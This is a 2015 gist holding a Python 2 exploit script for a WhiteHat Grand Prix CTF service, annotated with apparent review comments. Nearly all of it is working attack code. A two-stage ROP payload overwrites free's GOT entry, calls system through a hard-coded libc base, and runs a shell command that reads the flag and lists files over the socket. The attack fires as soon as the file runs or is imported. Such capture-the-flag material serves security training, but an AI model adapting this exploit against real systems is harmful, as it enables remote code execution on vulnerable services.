
@peternguyen93
Created October 28, 2015 02:40
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
# p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337)
# p = Pwn(port=1337)
def exploit():
    """Send the author's two-stage payload to the hard-coded CTF service.

    One pass does the following: connect through the project-local ``Pwn``
    helper, print the assumed base address, send stage 1 and stage 2, wait
    two seconds, send the shell command string, then call ``io()`` on the
    connection (presumably an interactive pass-through; ``Pwn`` is not
    shown on this page).

    The ``while`` loop ends with an unconditional ``break``, so the body
    runs exactly once per call.

    NOTE(review): every address below is a fixed constant. The chain
    therefore appears to rely on a non-position-independent binary, a
    writable GOT entry (the author's "overwrite free_got" note) and a
    predictable library load address. This is inferred from the constants
    only; the target binary is not on the page.
    """
    # Each command redirects its output to file descriptor 4. The chain in
    # stage 2 also passes 4 as the first argument of the call the author
    # labels "read cmd", so fd 4 is presumably the client socket (TODO confirm).
    shell_cmd = 'cat flag.txt >&4;ls -lia >&4;'

    # Hard-coded base address; the chain adds 261328 to it, which the
    # author's comment calls system_offset. An alternative offset, 0x4056f,
    # was left commented out in the original.
    libc_base = 0xF7E27000

    while True:
        conn = Pwn(host='lab9b.grandprix.whitehatvn.com', port=1337)
        conn.connect()
        print '[+] Base', hex(libc_base)

        # Stage 1: packed addresses plus filler, in the author's order.
        first_stage = (
            conn.pack(0x08048892)      # read more byte
            + conn.pack(0x080488e7)    # mov eax, 0 ; leave ; ret
            + 'D' * 4
            + conn.pack(0x08048c0f)    # ret
            + 'A' * 21 + '\x00'
            + '\x18\xa0'               # overwrite free_got
        )

        # Stage 2: 46 filler bytes followed by the packed address list.
        chain = [
            0x08048600,          # call target, unlabelled by the author
            0x08048bfd,          # pop esi ; pop edi ; pop ebp ; ret
            4,
            0x0804A078,          # read cmd
            len(shell_cmd),
            libc_base + 261328,  # base + system_offset
            0x41414141,
            0x0804A078,          # cmd
        ]
        second_stage = 'A' * 46 + conn.pA(chain)

        conn.send(first_stage)
        conn.send(second_stage)
        # Fixed two-second pause before the command string is sent.
        time.sleep(2)
        conn.send(shell_cmd)
        conn.io()
        break
# Module-level call with no `if __name__ == '__main__'` guard: running or
# importing this file immediately opens the network connection in exploit().
exploit()